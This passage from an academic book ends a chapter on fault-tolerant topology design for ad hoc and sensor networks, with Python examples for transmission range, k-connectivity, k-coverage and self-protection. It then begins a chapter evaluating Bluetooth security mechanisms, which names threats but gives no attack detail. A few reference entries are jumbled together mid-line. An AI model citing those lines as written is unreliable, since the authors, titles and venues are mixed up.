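    """Minimum maximum power assignment (Lloyd et al., 2002): binary search over the
    sorted candidate ranges (all pairwise distances) for the smallest common range at
    which the monotone property `holds(pts, r)` is true."""
    n = len(pts)
    cands = sorted({dist(pts[i], pts[j]) for i in range(n) for j in range(i + 1, n)})
    if not cands or not holds(pts, cands[-1]):
        raise ValueError("property does not hold even at the maximum range")
    lo, hi = 0, len(cands) - 1
    while lo < hi:
        mid = (lo + hi) // 2
        if holds(pts, cands[mid]):
            hi = mid
        else:
            lo = mid + 1
    return cands[lo]


def ctr_asymptotic(n: int, k: int, f_n: float = 0.0) -> float:
    """Wan and Yi (2004) asymptotic CTR for k-connectivity in the unit square:
    r_n = sqrt((log n + (2k-3) log log n + f(n)) / (pi n)); f(n) -> +inf gives
    k-connectivity with probability tending to one as n -> inf."""
    if n < 3:
        raise ValueError("log log n must be defined: need n >= 3")
    return math.sqrt((math.log(n) + (2 * k - 3) * math.log(math.log(n)) + f_n) / (math.pi * n))


def prob_min_degree_at_least(n: int, k: int, r: float, trials: int = 100, seed: int = 1) -> float:
    """Monte Carlo estimate of P(min degree >= k) for n nodes placed uniformly at random
    in the unit square (constructed deployments, fixed seed) with common range r."""
    rng = random.Random(seed)
    hits = 0
    for _ in range(trials):
        pts = [(rng.random(), rng.random()) for _ in range(n)]
        if min_degree(pts, r) >= k:
            hits += 1
    return hits / trials


if __name__ == "__main__":
    n, k = 200, 2
    for f_n in (0.0, 2.0, 4.0):
        r = ctr_asymptotic(n, k, f_n)
        p = prob_min_degree_at_least(n, k, r)
        print(f"f(n)={f_n:.1f}  r_n={r:.4f}  P(min degree >= {k}) ~ {p:.2f}")
    rng = random.Random(7)
    pts = [(rng.random(), rng.random()) for _ in range(n)]
    by_knn = min_degree_radius(pts, k)
    by_search = min_max_range(pts, lambda P, r: min_degree(P, r) >= k)
    print(f"one deployment: min-degree-{k} radius {by_knn:.4f} (binary search {by_search:.4f})")
```

The binary search and the k-th nearest neighbour computation return the same radius, which is the check the script prints; the search is the general tool, since it works for any monotone property (k-connectivity itself, tested by any connectivity routine) and not only for minimum degree. The Monte Carlo loop is the kind of simulation the chapter attributes to Li et al. (2003) for the regime where n is a small practical integer and the asymptotic bounds do not yet apply; increasing f(n) in the formula is what drives the estimated probability towards one.
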
Zhou, Das, and Gupta (2005) generalize the RNG structure to the k-RNG structure to preserve k-connectivity for sensor networks. In RNG, a link uv exists if and only if there is no other node w with edges uw and wv satisfying ||uw|| < ||uv|| and ||wv|| < ||uv|| simultaneously. Here ||.|| is the Euclidean distance. See Figure 2(b). In k-RNG, an edge exists between u and v if and only if there are at most (k-1) nodes w that satisfy ||uw|| < ||uv|| and ||wv|| < ||uv||. Obviously, similar to RNG, k-RNG can be constructed locally. Zhou et al. proved that k-RNG is k-connected if the original communication graph is k-connected. Notice that it is also easy to show that the same idea generalizes the GG structure to k-GG while preserving k-connectivity. There is an edge uv in k-GG if and only if there are at most (k-1) nodes inside the disk with uv as its diameter. See Figure 2(c). The nice property of GG and k-GG is that their power spanning ratios are equal to one (X.-Y. Li et al., 2001, 2002). In other words, GG/k-GG keep all links on least power consumption paths of the original communication graph. Notice that LMST/FLSS_k and RNG/k-RNG do not have this property.

X.-Y. Li et al. (2003) modify the Yao structure as follows such that the structure is k-connected. Each node u defines p equally separated rays originating at u, where p > 6. These rays define p cones inside the transmission range. Figure 2(d) shows an example with p = 8 cones. In each cone, u chooses the k closest nodes in that cone, if there are any, and adds directed links from u to these nodes. Ties are broken arbitrarily. X.-Y. Li et al. (2003) proved that the modified Yao structure (YG_{p,k}) preserves k-connectivity. In addition, YG_{p,k} is a length/power spanner with bounded node degree even when (k-1) nodes fail. Here a length/power spanner has constant length spanning ratio and power spanning ratio, which indicates that the topology is power efficient for unicast routing.

Bahramgiri et al. (2002) also discuss how to generalize the CBTC algorithm to ensure k-connectivity. Basically, each node enlarges its transmission range until it reaches its maximum power or the maximum angle between two consecutive neighbors in the induced topology is at most $2\pi/(3k)$. See Figure 2(e). Finally, it eliminates one-directional edges and keeps bidirectional edges. Bahramgiri et al. (2002) proved that the resulting topology is k-connected if the original graph is k-connected. We can also prove that the topology is a length spanner even with (k-1) node faults. However, unlike YG_{p,k}, the topology does not bound the node degree. A counterexample is given by X.-Y. Li et al. (2003), together with an enhancement method to bound the node degree.

Figure 3. Examples of dominating set and k-dominating set

While all geometric structures above are flat structures, there is another set of structures, called hierarchical structures, widely used in ad hoc and sensor networks. Instead of involving all nodes to relay packets for other nodes, hierarchical topology control protocols pick a subset of nodes to serve as cluster-heads. These cluster-heads form a virtual backbone and forward packets for other nodes. The structure used to build this virtual
backbone is usually a (connected) dominating set. Many distributed clustering (or dominating set) algorithms have been proposed in the literature (e.g., Alzoubi, Wan, & Frieder, 2002; Das & Bharghavan, 1997; Wan, Alzoubi, & Frieder, 2002; Wu & Li, 1999, 2001). All these algorithms first form several clusters where all cluster-heads form a dominating set. Each node either is a cluster-head (also called a dominator) or belongs to one cluster (i.e., it is dominated by a dominator). All the cluster-heads can then be connected via several additional gateways to form the virtual backbone. However, a single node failure may break the backbone in these algorithms. Thus, a fault tolerant design is needed for these backbones too.

Kuhn, Moscibroda, and Wattenhofer (2006) studied the k-dominating set (k-DS) problem: find a set of nodes such that each of the (other) nodes is dominated by at least k nodes from this set. The set of such nodes is called a k-dominating set. Thus, the backbone can survive (k-1) node failures in the k-dominating set. For example, black nodes v1 and v3 in Figure 3(b) form a DS for the network in Figure 3(a), while black nodes v3, v4, and v5 in Figure 3(d) form a 2-DS. Kuhn et al. (2006) give two distributed approximation algorithms for the minimum k-dominating set problem in two different models: general graphs and unit disk graphs (UDG). The first one is for general graphs and based on LP approximation. For an arbitrary parameter t, it runs in time $O(t^2)$ and achieves an approximation ratio of $O(t\Delta^{2/t}\log\Delta)$, where $\Delta$ denotes the maximal degree. The second one is a probabilistic algorithm for unit disk graphs. It runs in time $O(\log\log n)$ and achieves a constant approximation in expectation.

Dai and Wu (2005) studied how to construct a k-connected k-dominating set (k-CDS) as a backbone to balance efficiency and fault tolerance. Here, a k-DS is a k-CDS if its induced topology is k-connected. Figure 3(c) shows a CDS, and Figure 3(e) shows a 2-CDS. Three localized k-CDS construction algorithms are proposed. The first one (called k-Gossip) randomly selects virtual backbone nodes with a given probability $p_k$, where $p_k$ depends on network conditions and the value of k. The second one is a deterministic approach based on the authors' previous method for 1-CDS. The last algorithm (color-based k-CDS construction, CBKC) is a hybrid paradigm that enables 1-CDS algorithms to construct a k-CDS with high probability in relatively dense networks. It is a hybrid of probabilistic and deterministic approaches.

Besides k-DS and k-CDS, there are other techniques to enhance the fault tolerance of virtual backbones. Chen and Son (2005) present methods to add necessary redundant nodes to the simple CDS backbone, which results in a higher vertex connectivity. They also identify several factors and synchronization methods that may affect the redundant node selection. For example, the nodes in the CDS may prefer to select nodes with more power or higher degree or some combination of factors. Wang, Wang, and Li (2006) propose an efficient distributed method to construct a weighted backbone with low cost. By assuming each node has a cost, they can construct a weighted CDS whose total cost is within a constant factor of the optimal. If each node can estimate its probability of being faulty and we treat it as the weight, we can use the algorithm by Y. Wang et al. (2006) to build a fault tolerant backbone. Notice that building the most fault tolerant backbone is then equivalent to finding a CDS with the minimum total cost.

Most of the fault tolerant topology designs discussed so far assume the underlying communication graph is k-connected. This is true when the network density is large, but for a sparse network it may not hold. Bredin, Demaine, Hajiaghayi, and Rus (2005) studied the interesting problem of repairing a sensor network to guarantee a specified level of connectivity. They present a generic algorithm that determines how to establish k-connectivity by placing a minimum number of additional sensors geographically between existing pairs of sensors. This problem is NP-hard, and thus their algorithm is an approximation algorithm. They proved that the number of additional sensors is within a constant factor of the absolute minimum, for any fixed k.

A related fault tolerant problem in two-tiered sensor network deployment is studied by Hao, Tang, and Xue (2004) and Liu, Wan, and Jia (2005). A two-tiered sensor network is a cluster-based network.

Relay nodes are placed in the playing field to act as cluster-heads and to form a connected topology for data transmission in the higher tier. They are able to fuse data from the sensor nodes (lower tier) in their clusters and send them to sinks through the higher tier topology. Hao et al. (2004) studied a fault tolerant relay node placement problem, where a minimum number of relay nodes are placed such that (1) each sensor node can communicate with at least two relay nodes and (2) the network of relay nodes is 2-connected. They proved that the problem is NP-hard and gave an $O(D\log n)$-approximation, where D is the diameter of the network. Notice that the ratio is not a constant but a function of the size of the input. Liu et al. (2005) studied a more general relay node placement problem where a minimum number of relay nodes are placed in a two-tiered sensor network such that the whole network is (1) connected or (2) 2-connected. They assumed that sensor nodes do not participate in forwarding data for others. They first gave a $(6+\varepsilon)$-approximation algorithm for the 1-connectivity case. Then they further proposed a $(24+\varepsilon)$-approximation algorithm and a $(6/T+12+\varepsilon)$-approximation algorithm for the 2-connectivity case, respectively, for any $\varepsilon > 0$, where T is the ratio of the number of relay nodes placed to the number of sensors in the first case.

Thallner and Moser (2005) studied fault tolerant overlay topologies for a fully connected network. They modeled the network as a weighted complete graph, where the weight of an edge is the cost of that connection. Their proposed algorithm can build and maintain a k-regular subgraph that is k-connected and has low total weight. However, since it assumes a fully connected communication graph, the algorithm is more suitable for an overlay network (such as a peer-to-peer network) than for an ad hoc network.

Another fault tolerant issue in topology control is how to detect and recover from topology failures for classical topology control protocols (not the fault tolerant ones we discussed above). This line of work focuses on the design of detection and recovery schemes instead of designing topologies with a certain redundancy (k-connectivity). For example, Stratil (2005) presents an analysis of the requirements to tolerate crash failures in the topology with the help of failure detectors. Gupta and Younis (2003) also studied an efficient recovery mechanism for cluster-head failures. However, since fault detection and recovery are not the focus of this chapter, we do not review them in detail.

FAULT TOLERANT DESIGN IN COVERAGE AND PROTECTION

In sensor networks, the coverage problem (Cardei & Wu, 2006) is also a critical issue during topology design and sensor deployment. Usually each sensor has a sensing range covering a small sensing region, and it can sense certain kinds of events happening inside its sensing region. Thus, we say the sensor covers its sensing region. The main objective of the sensor network is to cover (monitor) an area A, that is, every point in the area should be covered. Some applications may require different degrees of coverage. A network has coverage degree k (k-coverage) if every location is within the sensing range of at least k sensors. Networks with a higher coverage degree can obtain higher sensing accuracy and be more robust to sensor failures. Given a sensor field with n sensor nodes of sensing range r deployed, and a desired coverage degree k ≥ 1, the minimum k-coverage problem studies how to select a minimal subset of nodes that entirely covers all locations in A such that every location is within the sensing range of at least k different nodes. The minimum k-coverage problem is also a well-known NP-hard problem. Figure 4 illustrates a set of examples of coverage sets. Figure 4(a) shows the sensors and their sensing ranges. Assume that the target area A is the big square area v1v3v9v7. Figures 4(b) and 4(c) give two 1-coverage sets (black nodes), while Figure 4(d) gives a 2-coverage set.

Zhou, Das, and Gupta (2004) studied the minimum connected k-coverage problem and give a centralized approximation algorithm that achieves an $O(\log n)$ approximation ratio. Their method is a greedy algorithm: iteratively adding a set of nodes which maximizes a measure called k-benefit to an initially empty set of nodes. The authors also present a distributed version of their algorithm.

Kumar, Lai, and Balogh (2004) studied the k-coverage problem in sensor networks where many sensors are put to sleep for most of their lifetimes. They
first propose a sleep/active schedule, to minimize energy consumption, in which each sensor is active with probability p, independently of the others. Then they derive the critical sensing range for their sleep scheme such that the sensor network achieves k-coverage with high probability.

Figure 4. Examples of k-coverage set in sensor networks

Yang, Dai, Cardei, and Wu (2006) also studied the minimum connected k-coverage problem, with a different coverage assumption. They assumed that the network is sufficiently dense so that point coverage can approximate area coverage. Thus, instead of covering the whole area A, they only require covering every sensor in area A. This k-coverage problem is also NP-hard since it is an extension of the k-dominating set problem. They propose a centralized approximation solution based on integer linear programming. The algorithm works by relaxing the problem to ordinary linear programming, where the variables may take real values. They also designed two distributed algorithms. One uses a cluster-based approach to select backbone nodes to form the active set; the other uses a pruning algorithm based only on 2-hop neighborhood information to reduce the number of active sensors.

Notice that the coverage problem studied by Yang et al. (2006) is the same problem studied by Wang, Zhang, and Liu (2006) and Wang, Li, and Zhang (2007) as the self-protection problem. A self-protection problem focuses on using sensor nodes to provide protection to themselves instead of to the objects or the area, so that they can resist attacks targeting them directly. A wireless sensor network is p-self-protected if, at any moment, for any wireless sensor (active or non-active), there are at least p active sensors that can monitor it. D. Wang et al. (2006) studied the minimum 1-self-protection problem and give a centralized method with a 2(1 + log n) approximation ratio, using an approximation algorithm for the minimum dominating set, and two randomized distributed algorithms. Wang et al. (2007) provide several efficient centralized and distributed algorithms with constant approximation ratios for the minimum p-self-protection problem in sensor networks with either homogeneous or heterogeneous sensing radii.

Not until recently have coverage and connectivity problems been studied together in sensor networks. Xing, Wang, Zhang, Lu, Pless, and Gill (2005) designed an integrated coverage-configuration protocol to provide both a certain degree of coverage and a connectivity guarantee. Zhang and Hou (2005) propose a decentralized density control algorithm to maintain sensing coverage and connectivity in high-density sensor networks. Both Xing et al. (2005) and Zhang and Hou (2005) prove that if the radio range is at least twice the sensing range, complete k-coverage of a convex area implies k-connectivity among the working set of nodes. Recently, Bai, Kumar, Xuan, and Lai (2006) studied the optimal deployment pattern to achieve both 1-coverage of an area and 2-connectivity of the sensors. Zhou et al. (2005) propose a set of distributed algorithms to achieve both k-connected and k-covered networks by using localized Voronoi and extended relative neighborhood graphs.

CONCLUSION

Fault tolerance is one of the premier system design desiderata in wireless ad hoc and sensor networks.
It is crucial to have a certain level of fault tolerance in most ad hoc and sensor applications, especially for those used in surveillance, security, and disaster relief. In addition, several network security schemes (such as localized intrusion detection) require that the underlying topology provide fault tolerance. In this chapter we discussed various fault tolerant techniques used in topology design, including those for power control, topology control, and sensor coverage. Due to space limits, we did not give all of the detailed algorithms, proofs, and simulation results for most of the techniques reviewed here. For more details, please refer to the references. Though fault tolerant topology design has attracted considerable attention and has been heavily studied recently, there are still many open problems, such as how to efficiently maintain the proposed fault tolerant topologies. We strongly believe that fault tolerant topology design remains a primary challenge and plays an important role in research on ad hoc and sensor networks.

REFERENCES

Althaus, E., Calinescu, G., Mandoiu, I., Prasad, S., Tchervenski, N., & Zelikovsky, A. (2003). Power efficient range assignment in ad-hoc wireless networks. In Proceedings of the IEEE Wireless Communications and Networking Conference (WCNC '03).

Alzoubi, K. M., Wan, P.-J., & Frieder, O. (2002). Message-optimal connected dominating sets in mobile ad hoc networks. In Proceedings of the 3rd ACM International Symposium on Mobile Ad Hoc Networking & Computing.

Bahramgiri, M., Hajiaghayi, M. T., & Mirrokni, V. S. (2002). Fault-tolerant and 3-dimensional

age and connectivity. In Proceedings of the ACM MobiHoc 2006.

Bettstetter, C. (2002). On the minimum node degree and connectivity of a wireless multihop network. In Proceedings of the 3rd ACM International Symposium on Mobile Ad Hoc Networking and Computing (MobiHoc '02).

Bose, P., Morin, P., Stojmenovic, I., & Urrutia, J. (2001). Routing with guaranteed delivery in ad hoc wireless networks. ACM/Kluwer Wireless Networks, 7(6), 609-616.

Bredin, J. L., Demaine, E. D., Hajiaghayi, M., & Rus, D. (2005). Deploying sensor networks with guaranteed capacity and fault tolerance. In Proceedings of the ACM MobiHoc 2005.

Calinescu, G., Kapoor, S., Olshevsky, A., & Zelikovsky, A. (2003). Network lifetime and power assignment in ad-hoc wireless networks. In Proceedings of the 11th Annual European Symposium on Algorithms (ESA 2003).

Calinescu, G., & Wan, P.-J. (2006). Range assignment for biconnectivity and k-edge connectivity in wireless ad hoc networks. ACM/Springer Mobile Networks and Applications (MONET), 11(2), 121-128.

Cardei, M., & Wu, J. (2006). Energy-efficient coverage problems in wireless ad hoc sensor networks. Computer Communications Journal, 29(4), 413-420. Elsevier.

Chen, W., & Huang, N. (1989). The strongly connecting problem on multi-hop packet radio networks. IEEE Transactions on Communications, 37(3), 293-295.

Chen, Y., & Son, S. H. (2005). A fault tolerant topology control in wireless sensor networks. In
distributed topology control algorithms in wireless Proceedings of the 3rd ACS/IEEE International
multi-hop networks. In Proceedings of the 11th An- Conference on Computer Systems and Applica-
nual IEEE Internation Conference on Computer tions.
Communications and Networks (ICCCN).
Cheriyan, J., Vempala, S., & Vetta, A. (2002).
Bai, X., Kuma, S., Xua, D., & Lai, T.H. (2006). Approximation algorithms for minimum-cost k-
Deploying wireless sensors to achieve both cover- vertex connected subgraphs. In Proceedings of
the 34th Annual ACM Symposium on Theory of
Computing.


Fault Tolerant Topology Design for Ad Hoc and Sensor Networks

Clementi, A., Huiban, G., Penna, P., Rossi, G., & Verhoeven, Y. C. (2002). Some recent theoretical advances and open questions on energy consumption in ad-hoc wireless networks. In Proceedings of the 3rd Workshop on Approximation and Randomization Algorithms in Communication Networks.

Clementi, A., Penna, P., & Silvestri, R. (2000). The power range assignment problem in radio networks on the plane. In Proceedings of the XVII Symposium on Theoretical Aspects of Computer Science (STACS '00) (LNCS 1770, pp. 651-660).

Dai, F., & Wu, J. (2005). On constructing k-connected k-dominating set in wireless networks. In Proceedings of the International Parallel and Distributed Processing Symposium.

Das, B., & Bharghavan, V. (1997). Routing in ad-hoc networks using minimum connected dominating sets. In Proceedings of the IEEE International Conference on Communications (ICC '97).

Gupta, P., & Kumar, P. R. (1998). Critical power for asymptotic connectivity in wireless networks. In W. M. McEneaney, G. Yin, & Q. Zhang (Eds.), Stochastic analysis, control, optimization and applications: A volume in honor of W. H. Fleming. Boston: Birkhäuser.

Gupta, G., & Younis, M. (2003). Fault-tolerant clustering of wireless sensor networks. In Proceedings of the IEEE Wireless Communications and Networking Conference 2003.

Hajiaghayi, M., Immorlica, N., & Mirrokni, V. S. (2003). Power optimization in fault-tolerant topology control algorithms for wireless multi-hop networks. In Proceedings of the 9th Annual International Conference on Mobile Computing and Networking.

Hao, B., Tang, J., & Xue, G. (2004). Fault-tolerant relay node placement in wireless sensor networks: Formulation and approximation. In Proceedings of the IEEE HPSR 2004.

Karp, B., & Kung, H. (2000). GPSR: Greedy perimeter stateless routing for wireless networks. In Proceedings of the ACM International Conference on Mobile Computing and Networking (MobiCom).

Khuller, S., & Vishkin, U. (1994). Biconnectivity approximations and graph carvings. Journal of the ACM, 41, 214-235.

Kirousis, L. M., Kranakis, E., Krizanc, D., & Pelc, A. (2000). Power consumption in packet radio networks. Theoretical Computer Science, 243(1-2), 289-305.

Kuhn, F., Moscibroda, T., & Wattenhofer, R. (2006). Fault-tolerant clustering in ad hoc and sensor networks. In Proceedings of the IEEE ICDCS 2006.

Kumar, S., Lai, T. H., & Balogh, J. (2004). On k-coverage in a mostly sleeping sensor network. In Proceedings of the ACM MobiCom 2004.

Li, L., Halpern, J. Y., Bahl, P., Wang, Y.-M., & Wattenhofer, R. (2001). Analysis of a cone-based distributed topology control algorithm for wireless multi-hop networks. In Proceedings of the ACM Symposium on Principles of Distributed Computing (PODC).

Li, N., & Hou, J. C. (2004). FLSS: A fault-tolerant topology control algorithm for wireless networks. In Proceedings of the ACM MobiCom 2004.

Li, N., Hou, J. C., & Sha, L. (2003). Design and analysis of an MST-based topology control algorithm. In Proceedings of the IEEE INFOCOM 2003.

Li, X.-Y., Wan, P.-J., & Wang, Y. (2001). Power efficient and sparse spanner for wireless ad hoc networks. In Proceedings of the IEEE International Conference on Computer Communications and Networks (ICCCN '01).

Li, X.-Y., Wan, P.-J., Wang, Y., & Frieder, O. (2002). Sparse power efficient topology for wireless networks. In Proceedings of the 35th IEEE Hawaii International Conference on System Sciences (HICSS-35).

Li, X.-Y., Wang, Y., Wan, P.-J., & Yi, C.-W. (2003). Fault tolerant deployment and topology control for wireless ad hoc networks. In Proceedings of the 4th ACM International Symposium on Mobile Ad Hoc Networking and Computing (MobiHoc '03).

Liu, H., Wan, P.-J., & Jia, X. (2005). Fault-tolerant relay node placement in wireless sensor networks. In Proceedings of COCOON 2005 (LNCS 3595, pp. 230-239).

Lloyd, L., Liu, R., Marathe, M. V., Ramanathan, R., & Ravi, S. S. (2002). Algorithmic aspects of topology control problems for ad hoc networks. In Proceedings of the 3rd ACM International Symposium on Mobile Ad Hoc Networking and Computing (MobiHoc '02).

Penrose, M. (1997). The longest edge of the random minimal spanning tree. Annals of Applied Probability, 7, 340-361.

Penrose, M. (1999). On k-connectivity for a geometric random graph. Random Structures and Algorithms, 15, 145-164.

Ramanathan, R., & Rosales-Hain, R. (2000). Topology control of multi-hop wireless networks using transmit power adjustment. In Proceedings of the IEEE INFOCOM.

Sanchez, M., Manzoni, P., & Haas, Z. (1999). Determination of critical transmission range in ad-hoc networks. In Proceedings of Multiaccess, Mobility and Teletraffic for Wireless Communications (MMT '99).

Seddigh, M., Gonzalez, J. S., & Stojmenovic, I. (2002). RNG and internal node based broadcasting algorithms for wireless one-to-one networks. ACM Mobile Computing and Communications Review, 5(2), 37-44.

Stratil, H. (2005). Fault tolerant topology control with unreliable failure detectors. In Proceedings of the 17th International Conference on Parallel and Distributed Computing and Systems.

Thallner, B., & Moser, H. (2005). Topology control for fault-tolerant communication in highly dynamic wireless networks. In Proceedings of the Third International Workshop on Intelligent Solutions in Embedded Systems.

Wan, P.-J., Alzoubi, K. M., & Frieder, O. (2002). Distributed construction of connected dominating set in wireless ad hoc networks. In Proceedings of the IEEE INFOCOM 2002.

Wan, P.-J., & Yi, C.-W. (2004). Asymptotic critical transmission radius and critical neighbor number for k-connectivity in wireless ad hoc networks. In Proceedings of the 5th ACM International Symposium on Mobile Ad Hoc Networking and Computing (MobiHoc '04).

Wan, P.-J., & Yi, C.-W. (2005). Asymptotic critical transmission ranges for connectivity in wireless ad hoc networks with Bernoulli nodes. In Proceedings of the IEEE 2005 Wireless Communications and Networking Conference (WCNC 2005), New Orleans.

Wang, Y., Li, X.-Y., & Zhang, Q. (2007). Efficient self protection algorithms for static wireless sensor networks. In Proceedings of the 50th IEEE Global Telecommunications Conference (Globecom 2007). Extended version to appear in IEEE Transactions on Parallel and Distributed Systems (TPDS), 2008.

Wang, Y., Wang, W., & Li, X.-Y. (2006). Efficient distributed low-cost weighted backbone formation for wireless ad hoc networks. IEEE Transactions on Parallel and Distributed Systems (TPDS), 17(7), 681-693.

Wang, D., Zhang, Q., & Liu, J. (2006). Self-protection for wireless sensor networks. In Proceedings of the IEEE ICDCS 2006.

Wattenhofer, R., Li, L., Bahl, P., & Wang, Y.-M. (2001). Distributed topology control for wireless multihop ad-hoc networks. In Proceedings of the IEEE INFOCOM 2001.

Wu, J., & Li, H. (1999). On calculating connected dominating set for efficient routing in ad hoc wireless networks. In Proceedings of the Third International Workshop on Discrete Algorithms and Methods for Mobile Computing and Communications.

Wu, J., & Li, H. (2000). Domination and its applications in ad hoc wireless networks with unidirectional links. In Proceedings of the International Conference on Parallel Processing.

Xing, G., Wang, X., Zhang, Y., Lu, C., Pless, R., & Gill, C. (2005). Integrated coverage and connectivity configuration for energy conservation in sensor networks. ACM Transactions on Sensor Networks, 1(1), 36-72.

Yang, S., Dai, F., Cardei, M., & Wu, J. (2006). On connected multiple point coverage in wireless sensor networks. Journal of Wireless Information Networks, 13(4), 289-301.

Zhang, H., & Hou, J. (2005). Maintaining sensing coverage and connectivity in large sensor networks. Ad Hoc and Sensor Wireless Networks: An International Journal, 1(1-2), 89-123.

Zhou, Z., Das, S., & Gupta, H. (2004). Connected k-coverage problem in sensor networks. In Proceedings of the International Conference on Computer Communications and Networks.

Zhou, Z., Das, S. R., & Gupta, H. (2005). Fault tolerant connected sensor cover with variable sensing and transmission ranges. In Proceedings of the IEEE MASS 2005.

KEY TERMS

Fault Tolerance: A network is fault tolerant, or k-fault tolerant, if it can survive a single failure, or k simultaneous node/link failures, respectively.

K-Connectivity: A network (graph) has k-connectivity, that is, it is k-connected, if for any pair of wireless devices (nodes) there are at least k node-disjoint paths connecting them; equivalently, it stays connected after the removal of any k-1 nodes.

K-Coverage: A sensor network achieves k-coverage if every location is covered by at least k different sensor nodes, that is, every location is within the sensing range of at least k different sensor nodes.

Power Control: Controls the network topology by adjusting each wireless device's transmission range to minimize energy consumption while maintaining a topology that is connected or has certain desired properties.

Self-Protection: A sensor network is p-self-protected if, at any moment, for any wireless sensor (active or nonactive), there are at least p active sensors that can monitor it.

Topology Control: Lets each wireless device locally select certain neighbors for communication, while maintaining a topology that can support energy efficient routing and improve the overall network performance.

Virtual Backbone: A connected backbone formed by a subset of wireless nodes selected to perform communication tasks for the other nodes and the whole network.
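The three properties defined above (k-connectivity, k-coverage and p-self-protection) are short to state but easy to get wrong when checking a concrete deployment, so the following is an added example, not code from the chapter or from the papers it reviews, that tests all three on a constructed 3x3 grid of sensors. The grid, the ranges, the active set and the sample points are assumptions. The k-connectivity test relies on the Menger characterization (a graph with more than k nodes is k-connected iff it stays connected after deleting any k-1 nodes) and enumerates node subsets, which is fine for a few dozen nodes but exponential in general; following the self-protection definition, a sensor is not counted as protecting itself.

```python
"""Checks for the fault-tolerance properties listed under Key Terms:
k-connectivity of the communication graph, k-coverage of sample points,
and p-self-protection of a sensor set.  Added example, not code from the
chapter or the papers it reviews; the deployment below is constructed."""
from itertools import combinations
import math


def dist(a, b):
    return math.hypot(a[0] - b[0], a[1] - b[1])


def unit_disk_graph(nodes, tx_range):
    """Communication graph: u and v are linked iff they are within tx_range."""
    adj = {u: set() for u in nodes}
    for u, v in combinations(nodes, 2):
        if dist(nodes[u], nodes[v]) <= tx_range:
            adj[u].add(v)
            adj[v].add(u)
    return adj


def is_connected(adj, removed=frozenset()):
    """Depth-first search over the graph with the `removed` nodes deleted."""
    alive = [u for u in adj if u not in removed]
    if not alive:
        return True
    seen, stack = {alive[0]}, [alive[0]]
    while stack:
        for v in adj[stack.pop()]:
            if v not in removed and v not in seen:
                seen.add(v)
                stack.append(v)
    return len(seen) == len(alive)


def is_k_connected(adj, k):
    """Menger: k node-disjoint paths between every pair <=> more than k nodes
    and still connected after deleting any k-1 of them.  Exhaustive over
    subsets, so only suitable for small topologies."""
    if len(adj) <= k:
        return False
    return all(is_connected(adj, frozenset(cut)) for cut in combinations(adj, k - 1))


def connectivity(adj):
    """Largest k for which the graph is k-connected (0 if disconnected)."""
    k = 0
    while is_k_connected(adj, k + 1):
        k += 1
    return k


def is_k_covered(nodes, active, sense_range, points, k):
    """Every sample point lies inside the sensing disk of at least k active sensors."""
    return all(sum(dist(pt, nodes[a]) <= sense_range for a in active) >= k for pt in points)


def is_p_self_protected(nodes, active, sense_range, p):
    """Every sensor, active or not, is within sensing range of at least p
    *other* active sensors (assumption: a sensor cannot protect itself)."""
    for u in nodes:
        guards = sum(1 for a in active if a != u and dist(nodes[u], nodes[a]) <= sense_range)
        if guards < p:
            return False
    return True


def grid_deployment():
    """Constructed deployment: 3x3 sensors at unit spacing, transmission and
    sensing range 1.0, every sensor active except the centre one."""
    nodes = {f"{r},{c}": (float(c), float(r)) for r in range(3) for c in range(3)}
    adj = unit_disk_graph(nodes, tx_range=1.0)
    active = {u for u in nodes if u != "1,1"}
    return nodes, adj, active


if __name__ == "__main__":
    nodes, adj, active = grid_deployment()
    print("connectivity of the grid:", connectivity(adj))  # 2: the corners have degree 2
    print("2-self-protected:", is_p_self_protected(nodes, active, 1.0, 2))
    print("3-self-protected:", is_p_self_protected(nodes, active, 1.0, 3))
    samples = [(1.0, 1.0), (0.5, 0.5)]
    print("3-covered at samples:", is_k_covered(nodes, active, 1.0, samples, 3))
```

The grid illustrates why the three properties are distinct: the communication graph is 2-connected but not 3-connected, the chosen active set is 2-self-protected but not 3-self-protected, and the two sample points are 3-covered but not 4-covered, so a deployment can be "k-fault tolerant" for routing while offering a weaker guarantee to the sensors themselves.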


Section IV
Security in Wireless PAN/LAN/MAN Networks

Chapter XLI
Evaluating Security Mechanisms in Different Protocol Layers for Bluetooth Connections

Georgios Kambourakis
University of the Aegean, Greece

Angelos Rouskas
University of the Aegean, Greece

Stefanos Gritzalis
University of the Aegean, Greece

ABSTRACT

Security is always an important factor in wireless connections. As with all other existing radio technologies, the Bluetooth standard is often cited to suffer from various vulnerabilities and security inefficiencies while attempting to optimize the trade-off between performance and complementary services including security. On the other hand, security protocols like IP security (IPsec) and secure shell (SSH) provide strong, flexible, low cost, and easy to implement solutions for exchanging data over insecure communication links. However, the employment of such robust security mechanisms in wireless realms requires additional research effort due to several limitations of the radio-based connections, for example, link bandwidth and unreliability. This chapter evaluates several Bluetooth personal area network (PAN) parameters, including absolute transfer times, link capacity, throughput, and goodput. The experiments employ both the Bluetooth native security mechanisms and the two aforementioned protocols. Through a plethora of scenarios utilizing both laptops and palmtops, we offer a comprehensive in-depth comparative analysis of each of the aforementioned security mechanisms when deployed over Bluetooth communication links.

INTRODUCTION

Without doubt, the Bluetooth specification (IEEE 802.15) (Bluetooth SIG, 2003; IEEE, 2002) is gradually becoming the de-facto standard for replacing short range wired communications using radio technology. According to estimations, devices incorporating Bluetooth are predicted to quadruple in number between now and 2008, from under 100 million to about 440 million. Bluetooth enabled devices are used in several different environments and cover a wide range of applications. For instance, for mobile applications, the device periodically connects to the network to download music, to transfer files, or to synchronize with one's desktop on calendar and other files. Consequently, the safety and security of these applications, for instance, the security of the private information stored on the devices, becomes a major issue. By attacking the communication link actively or passively, aggressors could obtain personal and also important business data. However, security features (Gehrmann, Persson, & Smeets, 2004) must be carefully considered and analyzed in order to decide whether Bluetooth technology indeed provides the right answer for any particular task or application.

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
Evaluating Security Mechanisms in Different Protocol Layers for Bluetooth Connections

The Bluetooth standard has long been criticized for various vulnerabilities and security inefficiencies, as its designers are trying to balance between performance and complementary services including security. So far, both the Bluetooth Special Interest Group (SIG) (Bluetooth SIG, 2003) and several researchers have made significant contributions on Bluetooth security aspects, discovering numerous vulnerabilities and potential weaknesses and proposing solutions (Adam, 2003; Gehrmann & Nyberg, 2002; Jacobson & Wetzel, 2001; Persson & Manivannan, 2003; Shaked & Wool, 2005). For example, the Bluetooth pairing procedure has been shown to be weak under certain circumstances. Moreover, other categories of threats, either active or passive, have also been investigated, including ad hoc security issues, malicious software like "Cabir," war-nibbling, and so forth.

